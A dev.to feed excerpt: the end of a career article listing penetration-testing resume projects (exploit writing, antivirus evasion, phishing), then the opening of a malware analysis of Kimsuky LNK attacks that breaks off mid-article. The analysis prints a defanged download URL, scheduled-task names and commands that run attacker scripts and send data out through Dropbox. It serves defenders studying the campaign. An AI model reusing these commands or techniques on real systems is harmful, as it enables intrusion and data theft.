penetration? </li> <li>What are common lateral movement techniques? </li> <li>How do you handle endpoint detection and response (EDR) or antivirus obstacles?</li> </ul> <h3> 4. OWASP Top 10 Vulnerability Reproduction and Exploit Development </h3> <p><strong>Project Core:</strong><br><br> Go beyond tool usage. Deeply analyse the principles of all <strong>OWASP Top 10</strong> vulnerability types. Set up vulnerable environments to reproduce them, and write custom <strong>POC/EXP</strong> for high‑profile flaws such as <strong>Log4j2</strong> and <strong>Shiro deserialisation</strong>.</p> <p><strong>Resume Highlight:</strong><br><br> Shakes off the “script kiddie” label, proving a solid understanding of vulnerability root causes and fundamental exploit development skills. Write:<br><br> <em>“Independently reproduced and analysed all OWASP Top 10 vulnerability types, developed **POC/EXP</em>* for over ten critical vulnerabilities, constructed complete exploit chains, and produced detailed vulnerability principle analysis reports.”*</p> <p><strong>Frequently Asked Interview Questions:</strong> </p> <ul> <li>Please explain the principle of vulnerability X in detail. </li> <li>What remediation approach would you recommend? </li> <li>What optimisations did you implement in your exploit?</li> </ul> <h3> 5. Mobile Application Penetration Testing </h3> <p><strong>Project Core:</strong><br><br> Conduct a comprehensive security assessment of mainstream Android applications using tools such as <strong>MobSF</strong>, <strong>Frida</strong>, and <strong>IDA</strong>. Cover client‑side security, server‑side API security, and data transmission security.</p> <p><strong>Resume Highlight:</strong><br><br> Expands the penetration testing boundary beyond pure web testing, showcasing <strong>full‑stack assessment capability</strong> – a differentiator on resumes. Write:<br><br> <em>“Independently performed an end‑to‑end security test on an Android app, uncovering **hard‑coded credentials, unauthorised APIs, cleartext data transmission</em>* and more than eight other vulnerabilities, and delivered a full test report along with a client‑hardening proposal.”*</p> <p><strong>Frequently Asked Interview Questions:</strong> </p> <ul> <li>How do you bypass SSL Pinning? </li> <li>What are the core use cases for Frida? </li> <li>Describe the complete process of reverse engineering an Android app.</li> </ul> <h3> 6. Incident Response and Traceback Practice </h3> <p><strong>Project Core:</strong><br><br> Use dedicated incident response labs to perform <strong>Windows and Linux log analysis</strong>, <strong>malware sample analysis</strong>, <strong>backdoor hunting</strong>, and <strong>full attack‑chain traceback</strong>, culminating in a formal incident response report.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F74taqttxdw11p6iv8kaz.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F74taqttxdw11p6iv8kaz.png" alt=" " width="800" height="628"></a></p> <p><strong>Resume Highlight:</strong><br><br> Demonstrates both offensive and defensive skills – you don’t just attack, you can defend and trace back. This is a highly valued capability for in‑house security teams. Write:<br><br> <em>“Conducted multi‑scenario incident response exercises, accurately reconstructed the complete attack chain, performed malware analysis, backdoor removal, and forensic traceback, and generated industry‑standard incident response reports with hardening recommendations.”</em></p> <p><strong>Frequently Asked Interview Questions:</strong> </p> <ul> <li>What are the critical Windows event IDs for intrusion detection? </li> <li>How do you locate hidden backdoors on a Linux system? </li> <li>How do you identify the attacker’s initial entry point?</li> </ul> <h2> Part II: Advanced Projects (8 Projects) </h2> <p>These are suited for penetration testers with <strong>1–3 years of experience</strong>. They help you break away from the pack, target mid‑to‑high‑salary positions, and cover the most in‑demand scenarios in the industry.</p> <h3> 7. Enterprise Red‑Team Attack and Defense Exercise </h3> <p><strong>Project Core:</strong><br><br> Simulate a real <strong>APT attack flow</strong> based on the <strong>ATT&amp;CK framework</strong>, conducting reconnaissance, social engineering based phishing for initial access, persistence, lateral movement, data exfiltration, and covering tracks – completing the full red‑team kill chain.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fj0bdrrliqew68s88g9uo.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fj0bdrrliqew68s88g9uo.png" alt=" " width="800" height="613"></a></p> <p><strong>Resume Highlight:</strong><br><br> Red‑team capability is a core recruitment requirement for security service providers and large tech firms, and a significant salary multiplier. Write:<br><br> <em>“As a **core member</em>* of an enterprise red‑team exercise, implemented a complete attack chain aligned with ATT&amp;CK, breached the perimeter using N‑day vulnerabilities and spear‑phishing, performed multi‑layer lateral movement, obtained access to critical business systems, and produced a comprehensive red‑team report with defensive recommendations.”*</p> <p><strong>Frequently Asked Interview Questions:</strong> </p> <ul> <li>What are the key stages of the ATT&amp;CK framework? </li> <li>Which part of the exercise were you primarily responsible for? </li> <li>What was the strongest defence you encountered and how did you bypass it?</li> </ul> <h3> 8. Cloud Environment Penetration Testing </h3> <p><strong>Project Core:</strong><br><br> Focus on major cloud providers such as <strong>AWS</strong>, <strong>Azure</strong>, <strong>Google Cloud</strong>, <strong>Alibaba Cloud</strong>, <strong>Tencent Cloud</strong> (or other regional providers). Conduct full‑spectrum security assessment of cloud resources: <strong>ECS instances, OSS buckets, RDS databases, containers, and Kubernetes clusters</strong>, including cloud misconfigurations, container escape, and IAM privilege abuse.</p> <p><strong>Resume Highlight:</strong><br><br> Over 90% of enterprises have adopted cloud services; cloud penetration testing is now an indispensable skill. This project aligns directly with real business environments. Write:<br><br> <em>“Performed full‑scenario cloud penetration testing on mainstream cloud platforms, covering compute, storage, container, and K8s cluster security. Discovered high‑risk issues such as **OSS public access, container escape, and improper K8s RBAC configuration</em><em>, and delivered cloud‑specific hardening guidance.”</em></p> <p><strong>Frequently Asked Interview Questions:</strong> </p> <ul> <li>What are common container escape techniques? </li> <li>What are the core security risks in a Kubernetes cluster? </li> <li>Name typical cloud IAM misconfigurations.</li> </ul> <h3> 9. Industrial Control System (ICS) Penetration Testing </h3> <p><strong>Project Core:</strong><br><br> Set up a simulated industrial control environment, targeting <strong>SCADA systems</strong>, <strong>PLC controllers</strong>, and <strong>HMI/SCADA software</strong>. Discover ICS‑specific vulnerabilities and produce test reports aligned with <strong>applicable cybersecurity requirements for operational technology</strong>.</p> <p><strong>Resume Highlight:</strong><br><br> ICS security is a nationally prioritised domain with a vast talent gap. ICS penetration capability offers a distinct competitive edge, helping you escape the intense commoditisation of web‑only testing. Write:<br><br> <em>“Independently built an ICS simulation environment and performed penetration testing on SCADA, PLC, and HMI components, identifying unauthorised access, hard‑coded credentials, and proprietary protocol vulnerabilities, and delivered standards‑aligned test report and hardening plan.”</em></p> <p><strong>Frequently Asked Interview Questions:</strong> </p> <ul> <li>What are the fundamental differences between ICS penetration testing and traditional IT penetration testing? </li> <li>How do you prevent operational impact on live industrial processes? </li> <li>What security flaws are typical in common industrial protocols?</li> </ul> <h3> 10. White‑Box Code Auditing Practice </h3> <p><strong>Project Core:</strong><br><br> Target open‑source PHP/Java systems and custom enterprise business applications. Use tools like <strong>CodeQL</strong>, <strong>Seay</strong>, <strong>Fortify</strong>, combined with manual review, to uncover vulnerabilities across all categories and produce detailed analysis reports with code‑level fixes.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5wo0ht4m0tygmeaj935j.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5wo0ht4m0tygmeaj935j.png" alt=" " width="800" height="538"></a></p> <p><strong>Resume Highlight:</strong><br><br> Code auditing ability is a <strong>core competitive advantage</strong>. Engineers proficient in white‑box testing find vulnerabilities much more efficiently than those relying solely on black‑box testing – a key hiring demand at large enterprises. Write:<br><br> <em>“Conducted white‑box code audits on **more than 20</em>* open‑source or commercial systems, identifying SQL injection, command injection, deserialisation, and other critical flaws, uncovered over 20 high‑risk vulnerabilities, and delivered complete analysis reports with patch code, assisting vendors in releasing security updates.”*</p> <p><strong>Frequently Asked Interview Questions:</strong> </p> <ul> <li>Describe your complete code auditing workflow. </li> <li>What type of auditing scenario are you most skilled at? </li> <li>How do you quickly locate dangerous functions and risk points in source code?</li> </ul> <h3> 11. Antivirus Evasion Research and Tool Development </h3> <p><strong>Project Core:</strong><br><br> Research static and dynamic evasion techniques against mainstream domestic EDR and antivirus products. Implement and apply methods such as <strong>shellcode encryption, reflective loading, and code obfuscation</strong>, and develop your own evasion tools.</p> <p><strong>Resume Highlight:</strong><br><br> Evasion is a <strong>core competency</strong> in internal network penetration and red‑team operations. Engineers skilled in evasion often command salaries <strong>30% or more</strong> above peers without this skill. Write:<br><br> <em>“Independently developed multiple evasion tools incorporating shellcode encryption, staged loading, and execution obfuscation. Successfully bypassed static and dynamic detection of leading domestic EDR/AV products, enabling persistence and lateral movement. Produced a detailed technical research report on evasion methodologies.”</em></p> <p><strong>Frequently Asked Interview Questions:</strong> </p> <ul> <li>What are the mainstream evasion techniques? </li> <li>How do you bypass EDR behavioural detection? </li> <li>What is the key advantage of the evasion tool you developed?</li> </ul> <h3> 12. N‑day Vulnerability Discovery and Exploit Development </h3> <p><strong>Project Core:</strong><br><br> Use <strong>fuzzing</strong> and <strong>binary reverse engineering</strong> to find vulnerabilities in open‑source components and commercial software. Reproduce and analyse N‑day vulnerabilities, craft complete <strong>POC</strong> (Proof of Concept) and <strong>EXP</strong> (Exploit) codes, and submit them to a vulnerability database to obtain official identifiers.</p> <p><strong>Resume Highlight:</strong><br><br> This is a key differentiator from average penetration testers, demonstrating core vulnerability research and development ability – the foundation for entering a <strong>security research</strong> role in major tech firms. Write:<br><br> <em>“Applied fuzzing and reverse engineering techniques to discover and reproduce **three or more high‑risk N‑day vulnerabilities</em>* in open‑source components and commercial software. Authored full POC/EXP and analysis reports, and obtained official <strong>CVE</strong> identifiers.”*</p> <p><strong>Frequently Asked Interview Questions:</strong> </p> <ul> <li>Describe your complete fuzzing workflow. </li> <li>What reverse engineering and fuzzing tools do you commonly use? </li> <li>Walk me through the principle and exploitation chain of one vulnerability you discovered.</li> </ul> <h3> 13. Social Engineering Hands‑on Project </h3> <p><strong>Project Core:</strong><br><br> Participate in the social engineering component of a red‑team exercise. Conduct target information collection, craft phishing email templates, build phishing websites, perform vishing (phone‑based social engineering), and use social engineering to breach the enterprise perimeter.</p> <p><strong>Resume Highlight:</strong><br><br> Over 80% of real‑world attack simulations achieve initial access through social engineering. Social engineering proficiency is a must‑have skill for red‑team members. Write:<br><br> <em>“As a core member of a red‑team exercise, independently handled the social engineering attack phase: designed phishing emails, built credential‑harvesting sites, gathered target intelligence, successfully obtained employee account credentials, breached the enterprise boundary, and produced a detailed social engineering attack report and a security awareness training programme.”</em></p> <p><strong>Frequently Asked Interview Questions:</strong> </p> <ul> <li>What is the most successful social engineering case you have conducted? </li> <li>How do you increase the click‑through rate of phishing emails? </li> <li>How do you evade enterprise email security gateways?</li> </ul> <h3> 14. Enterprise Compliance Penetration Testing Commercial Project </h3> <p><strong>Project Core:</strong><br><br> Act as the <strong>project lead</strong> for small and medium‑sized enterprises, performing penetration testing as part of <strong>regulatory compliance evaluations</strong> or annual security assessments. Handle the full process: scoping, testing, reporting, client communication, and remediation guidance – achieving a fully closed loop.</p> <p><strong>Resume Highlight:</strong><br><br> Real‑world commercial project experience is a <strong>major differentiator</strong> for security service positions, much more persuasive than any lab exercise. Write:<br><br> <em>“As project lead, successfully delivered **10+ compliance penetration tests</em>* for SMEs, covering web applications, internal networks, and mobile apps. Identified over 50 high‑risk vulnerabilities, produced standards‑aligned compliance reports, and guided clients through remediation and compliance acceptance with <strong>100% satisfaction.</strong>”*</p> <p><strong>Frequently Asked Interview Questions:</strong> </p> <ul> <li>What is the full workflow of a commercial penetration test? </li> <li>How do you communicate security risks to a non‑technical client? </li> <li>How do you handle a client that refuses to fix a reported vulnerability?</li> </ul> <h2> Part III: Expert‑Level Projects (6 Projects) </h2> <p>For professionals with <strong>3+ years of experience</strong>, these projects help you target <strong>high‑salary, specialist, and management positions</strong> at major firms, demonstrating industry influence and a strategic mindset.</p> <h3> 15. National / Provincial “Cyber Hunt” Network Attack and Defense Drill Project/Exercise </h3> <p><strong>Project Core:</strong><br><br> Serve as a <strong>core red‑team member</strong> in national‑ or provincial‑level large‑scale red‑vs‑blue exercises (e.g., industry‑wide or national‑level capture‑the‑flag events). Lead a subgroup to breach target organisations, report attack outcomes, perform kill‑chain retrospectives, and deliver comprehensive reports.</p> <p><strong>Resume Highlight:</strong><br><br> Cyber attack and defense experience is the “golden ticket” of the cybersecurity community. Engineers with top‑tier red‑team backgrounds often see their salaries <strong>double</strong>; it is a door‑opener for <strong>T‑level</strong> roles at tech giants. Write:<br><br> <em>“Served as a core red‑team member in a national/provincial exercise, leading a team to achieve target breakthroughs. Obtained **15+ critical system authorisations</em><em>, submitted **30+ effective attack results</em><em>, and ranked within the **top 5</em>* in the province. Delivered the complete attack chain report and enterprise defence optimisation plan.”*</p> <p><strong>Frequently Asked Interview Questions:</strong> </p> <ul> <li>Which part of the network attack and defense drill project did you lead? </li> <li>What was the strongest defence system you faced and how did you overcome it? </li> <li>Narrate a classic attack case from your experience.</li> </ul> <h3> 16. Enterprise Security Architecture Construction Project </h3> <p><strong>Project Core:</strong><br><br> From an <strong>attacker’s perspective</strong>, design and implement a holistic security protection system for a large enterprise, covering <strong>perimeter defence, internal network security, endpoint security, data security, and incident response</strong>.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhqdr928ooa34rxfld0vu.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhqdr928ooa34rxfld0vu.png" alt=" " width="800" height="607"></a></p> <p><strong>Resume Highlight:</strong><br><br> Demonstrates your <strong>big‑picture view</strong>, transforming you from “just a hacker” into a <strong>“security expert who understands business and can execute”</strong> – the core project for targeting <strong>security management</strong> or <strong>head of security</strong> roles. Write:<br><br> <em>“As the security expert, led the enterprise security architecture construction project. Performed a full‑spectrum risk assessment from an attacker’s viewpoint, designed and deployed a complete stack including perimeter firewalls, WAF, EDR, SOC, and data leakage prevention. Established a 24/7 incident response mechanism, raising the high‑risk vulnerability remediation rate to **99%</em>* and reducing incident response time by <strong>80%</strong>.”*</p> <p><strong>Frequently Asked Interview Questions:</strong> </p> <ul> <li>What is the core philosophy behind enterprise security architecture building? </li> <li>How do you balance security requirements with business operations? </li> <li>How do you drive the adoption of security solutions within an organisation?</li> </ul> <h3> 17. APT Attack Simulation and Attribution Analysis </h3> <p><strong>Project Core:</strong><br><br> Replicate the tactics of known <strong>APT groups</strong>, simulate a complete <strong>APT kill chain</strong>, perform <strong>malware reverse engineering</strong>, <strong>C2 communication protocol analysis</strong>, and <strong>attack‑path attribution</strong>, ultimately producing an <strong>adversary profile</strong> and tailored <strong>defence strategies</strong>.</p> <p><strong>Resume Highlight:</strong><br><br> Showcases top‑tier offensive and defensive research skills – the key project for roles in <strong>threat intelligence</strong> and <strong>security research</strong> at leading companies. Write:<br><br> <em>“Independently reproduced the TTPs of major APT groups, reconstructed the full attack chain aligned with ATT&amp;CK, performed malware reverse engineering and C2 protocol dissection, conducted attack‑chain attribution, and published the APT group profile along with enterprise‑grade defence recommendations in a **top domestic security community</em><em>.”</em></p> <p><strong>Frequently Asked Interview Questions:</strong> </p> <ul> <li>What are the hallmark techniques of the APT groups you have studied? </li> <li>Describe your complete malware analysis workflow. </li> <li>How do you attribute and track an APT attack?</li> </ul> <h3> 18. Penetration Testing Weaponisation Tool Development </h3> <p><strong>Project Core:</strong><br><br> Independently design and develop an <strong>enterprise‑grade penetration testing toolset</strong> covering all phases: reconnaissance, vulnerability scanning, internal network penetration, evasion, and persistence. Open‑source the tools and promote them within the industry.</p> <p><strong>Resume Highlight:</strong><br><br> Top penetration engineers build their own infrastructure. The ability to develop your own tools is the most direct proof of technical depth and the key to industry influence. Write:<br><br> <em>“Designed and built an enterprise penetration testing toolset that covers information gathering, vulnerability scanning, and internal network exploitation, solving key pain points of existing tools. The toolset has been used over **100,000</em>* times, with the open‑source project garnering over <strong>2,000 GitHub stars</strong>, improving penetration testing efficiency by <strong>300%</strong>.”*</p> <p><strong>Frequently Asked Interview Questions:</strong> </p> <ul> <li>What is the core architecture of your tool? </li> <li>What industry pain point does it solve? </li> <li>What technology stack did you use, and what are your future optimisation plans?</li> </ul> <h3> 19. Data Security and Privacy Compliance Penetration Test </h3> <p><strong>Project Core:</strong><br><br> Based on the requirements of the <strong>Data Security Law</strong> and <strong>Personal Information Protection Law (PIPL)</strong>, conduct a full data‑lifecycle security assessment and penetration test for a large enterprise. Identify compliance risks, propose remediation measures, and help the enterprise pass compliance audits.</p> <p><strong>Resume Highlight:</strong><br><br> Data compliance is an urgent need for today’s enterprises. Penetration testers who are proficient in data security and regulations are rare and command a significant salary premium. Write:<br><br> <em>“As project lead, successfully delivered a data security compliance penetration test for a large enterprise. In accordance with the applicable local laws and regulations (e.g., data protection, privacy, and cybersecurity laws), performed lifecycle risk assessment, discovering **over 30 compliance risks</em>* including plaintext data storage, unauthorised data access, and excessive personal information collection. Provided a complete remediation plan that enabled the client to pass <strong>enabled the client to pass a high‑level compliance audit</strong> and data security compliance audits.”*</p> <p><strong>Frequently Asked Interview Questions:</strong> </p> <ul> <li>What is the core approach for a data security penetration test? </li> <li>What are the key requirements of the PIPL regarding personal information processing? </li> <li>How do you assess an enterprise’s data leakage risk?</li> </ul> <h3> 20. Security Research and Industry Influence Building </h3> <p><strong>Project Core:</strong><br><br> Dedicate long‑term effort to penetration testing and cybersecurity research. Publish original technical articles on platforms like <strong>Medium</strong>, <strong>Dev.to</strong>, <strong>Github</strong>, <strong>SANS ISC</strong>; open‑source security tools; apply for <strong>CVE</strong> identifiers; and accept invitations to speak at security conferences.</p> <p><strong>Resume Highlight:</strong><br><br> This is a defining trait of a <strong>senior security expert</strong>, demonstrating industry influence and continuous research capability – an essential booster for top‑level positions in large organisations. Write:<br><br> <em>“Long‑term engagement in penetration testing and security research: published over **50 original articles</em>* in top domestic communities with cumulative reads exceeding <strong>1 million</strong>; open‑source security projects have accumulated <strong>1,000+ GitHub stars</strong>; obtained <strong>10+ CVE/CNVD identifiers</strong>; and delivered technical talks at industry conferences, earning broad recognition.”*</p> <p><strong>Frequently Asked Interview Questions:</strong> </p> <ul> <li>What is your most impactful research contribution? </li> <li>What are your views on the future evolution of penetration testing? </li> <li>What are your upcoming research directions?</li> </ul> <h2> Final Thoughts </h2> <p>The field of penetration testing is not about how many knowledge points you have memorised or how many tools you can name. It is about who can <strong>solve real problems</strong> and who possesses <strong>complete, hands‑on, closed‑loop capability</strong>.</p> <p>Every project entry on your resume is a piece of evidence of your ability, not filler text. Rather than listing ten items that merely say “familiar with …,” focus deeply on one project and make it thorough, detailed, and comprehensive.</p> <p>The twenty projects presented above offer a path for everyone, whether you are a newcomer just entering the field or an experienced practitioner. Put them into practice, and your resume may very well become one that interviewers eagerly reach for.</p> <h2> Disclaimer </h2> <p><em>The programs and techniques described in this article are intended solely for legal and authorised security research and educational purposes, aimed at enhancing network defence capabilities. Any individual or organisation that uses the content for unauthorised attacks or illegal activities shall bear full legal liability and compensation; the author and publisher assume no joint liability.</em></p> career cybersecurity security pentest Kimsuky Deploys Malicious LNK Files to Implant Python-Based Backdoor in Multi-Stage Attack Excalibra Mon, 13 Apr 2026 17:43:19 +0000 https://dev.to/excalibra/kimsuky-deploys-malicious-lnk-files-to-implant-python-based-backdoor-in-multi-stage-attack-1521 https://dev.to/excalibra/kimsuky-deploys-malicious-lnk-files-to-implant-python-based-backdoor-in-multi-stage-attack-1521 <p><strong>Notable Changes Observed in Malicious LNK Files Distributed by Kimsuky Group</strong></p> <p><strong>Article Summary:</strong> The North Korean Kimsuky hacker group recently used malicious LNK files disguised as HWP documents to launch multi-stage attacks. They extended the attack chain by adding intermediate stages such as XML, VBS, and PS1 files to evade detection. The attack creates hidden folders, registers scheduled tasks for persistence, and finally deploys a Python backdoor that supports remote command execution, file theft, and other capabilities. Data is exfiltrated through Dropbox to blend in with normal traffic.</p> <p><strong>Categories:</strong> Malware, Threat Intelligence, Incident Response, Vulnerability Analysis, Red Team</p> <p>Recently, a clear evolution has been detected in the malicious LNK files being distributed by the <strong>Kimsuky</strong> group. While the overall flow leading to the execution of a Python-based backdoor or downloader remains similar to previous campaigns, the actual execution process now employs a significantly more complex multi-layered structure. The group is also abusing legitimate cloud services and attempting to evade detection through Python-based malware. Because these files are difficult to identify by appearance alone, user vigilance has become even more critical. In this article, we examine the changed delivery method, key characteristics, and the full attack flow.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpqfc3mksre1lmunjgrdc.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpqfc3mksre1lmunjgrdc.png" alt="Table 1" width="800" height="535"></a></p> <p><em>[Table 1] Comparison of Past and Recent Delivery Methods</em></p> <h2> 1. Past LNK Delivery Method </h2> <h3> 1-1. Initial Execution </h3> <p>Previous LNK files operated by executing a PowerShell script that downloaded a BAT file from an external URL.</p> <ul> <li>URL: <code>hxxps://qugesr[.]online/m/bDw</code> </li> </ul> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fy96ysrnm02z2bbxdv96t.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fy96ysrnm02z2bbxdv96t.png" alt="Figure 1" width="602" height="477"></a></p> <p><em>[Figure 1] Malicious BAT Script File</em></p> <h3> 1-2. Intermediate Stage </h3> <p>The downloaded BAT file further downloads additional ZIP files and decoy files. It then downloads split ZIP fragments individually, merges them into a single archive, and extracts it. The resulting archive contains a Python script, Python interpreter, and an XML scheduled task file (<code>sch.db</code>). Based on the XML file, a scheduled task named <strong>Microsoft_Upgrade{10-9903-09-821392134}</strong> is registered. The Python script is then executed via the task scheduler, ultimately leading to the download and execution of the Python-based backdoor.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb3tzu2x7ko202nfklhpz.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb3tzu2x7ko202nfklhpz.png" alt="Table 2" width="800" height="270"></a></p> <p><em>[Table 2] Additional File Downloads</em></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgsdgez5pf0aq1bv0t47d.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgsdgez5pf0aq1bv0t47d.png" alt="Figure 2" width="539" height="797"></a></p> <p><em>[Figure 2] Legitimate Decoy File</em></p> <h2> 2. Recent LNK Delivery Method </h2> <h3> 2-1. Initial Execution </h3> <p>The recently distributed LNK files — “Resume (Park Seong-min).hwp.lnk” and “Guidelines for Establishing Data Backup and Recovery Procedures (Reference).lnk” — execute a PowerShell script just like previous versions. They create a folder at <code>C:\windirr</code> with hidden and system attributes. This is presumed to be an anti-forensic measure to prevent the path from appearing in normal user file exploration. The LNK then drops and executes the files it contains into this folder. Among them is a legitimate decoy file, and an HWP document using the exact same filename as the LNK is created to fool the victim.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fg6uktk7gel70nctvvcrk.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fg6uktk7gel70nctvvcrk.png" alt="Figure 3" width="800" height="489"></a></p> <p><em>[Figure 3] Legitimate Decoy File</em></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flsc12nvyq4dlq0tye982.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flsc12nvyq4dlq0tye982.png" alt="Table 3" width="800" height="224"></a></p> <p><em>[Table 3] File Functions</em></p> <h3> 2-2. Intermediate Stage </h3> <p>A scheduled task is created based on an XML file. The task name is set to <strong>GoogleUpdateTaskMachineCGI__{56C6A980-91A1-4DB2-9812-5158E7E97388}</strong>. Inside the XML, a task is defined that repeatedly runs the command <code>wscript.exe /b "C:\windirr\11.vbs"</code> every 17 minutes starting from 2025-08-26 15:17. When the VBS file executes via the scheduler, it launches <code>C:\windirr\pp.ps1</code>.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fg6b7fst77kxvaicnxpuo.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fg6b7fst77kxvaicnxpuo.png" alt="Figure 4" width="800" height="203"></a></p> <p><em>[Figure 4] Registered Scheduled Task</em></p> <p>The <code>pp.ps1</code> script creates <code>C:\Users\Public\Documents\tmp.ini</code> and saves the information listed in [Table 4] into it. The attackers are using Dropbox as a C2 channel for data exfiltration. Stolen data is uploaded with filenames in the format <code>&lt;userdomain&gt;_&lt;date&gt;_info.ini</code>. Additionally, the file <code>zzz09_test.db_sent</code> from the attacker’s Dropbox is downloaded and saved as <code>C:\Users\Public\Music\hh.bat</code>, then executed with <code>cmd.exe /c C:\Users\Public\Music\hh.bat</code>.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fn9zqexldc38xz5qjviwb.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fn9zqexldc38xz5qjviwb.png" alt="Table 4" width="800" height="142"></a></p> <p><em>[Table 4] Exfiltrated Information</em></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnlewoy4yzcvd7zvhrwkw.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnlewoy4yzcvd7zvhrwkw.png" alt="Figure 5" width="800" height="433"></a></p> <p><em>[Figure 5] Partial Code from pp.ps1</em></p> <p>The <code>hh.bat</code> file downloads two split ZIP fragments from the URLs below, merges them into a single ZIP at <code>%TEMP%\G9081234.zip</code>, and extracts it to <code>C:\winii</code>. Inside the archive are an XML scheduled task file (<code>norton.db</code>) and the Python backdoor (<code>beauty.py</code>).</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F907u7xyfqxmd45nb2cq3.png" class="article-body-image-wrapper"><img 